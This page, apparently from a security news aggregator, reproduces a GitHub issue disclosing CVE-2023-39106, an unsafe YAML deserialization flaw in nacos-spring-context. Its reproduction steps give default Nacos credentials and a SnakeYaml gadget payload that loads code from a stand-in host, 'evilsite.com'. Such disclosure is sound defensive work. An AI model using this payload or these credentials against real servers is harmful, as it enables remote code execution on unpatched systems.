Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-39106: YAML deserialization vulnerability leads to RCE · Issue #314 · nacos-group/nacos-spring-project

An issue in Nacos Group Nacos Spring Project v.1.1.1 and before allows a remote attacker to execute arbitrary code via the SnakeYamls Constructor() component.

CVE
#vulnerability#java#rce#alibaba#ssl

Issue Description

The SnakeYaml’s Constructor() class is used in the component nacos-spring-context, but it does not restrict types that can be instantiated during deserialization.

Describe what happened (or what feature you want)

Deserializing yaml content provided by an attacker can lead to remote code execution.
So when spring framework project uses nacos-spring-context as a dependency, It will be easily RCE by just adding evil config in nacos server.

Describe what you expected to happen

Unsupported YAML content.

How to reproduce it (as minimally and precisely as possible)

  1. Create a project of empty spring-framework, and add dependency of nacos-spring-context.

  2. Add codes below, as the document says, it setting NacosPropertySource:

    +import com.alibaba.nacos.api.config.ConfigType; +import com.alibaba.nacos.spring.context.annotation.config.NacosPropertySource;

    @SpringBootApplication +@NacosPropertySource(dataId = "example.yaml", type=ConfigType.YAML, autoRefreshed=true) public class Application {

        public static void main(String[] args) {
              ......
    
  3. Now login to nacos config server(default at http://127.0.0.1:8848 with credential of nacos/nacos), then edit example.yaml, add one line of config below:

    test: !!javax.script.ScriptEngineManager [ !!java.net.URLClassLoader [[ !!java.net.URL [ “http://evilsite.com” ]]]]

Tell us your environment

spring-framework 2.7.8
nacos-spring-context 1.1.1

Anything else we need to know?

Related news

GHSA-v6c8-pwhq-288m: Nacos Spring vulnerable to Unsafe Deserialization

An issue in Nacos Group Nacos Spring Project v.1.1.1 and before allows a remote attacker to execute arbitrary code via the SnakeYamls Constructor() component.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907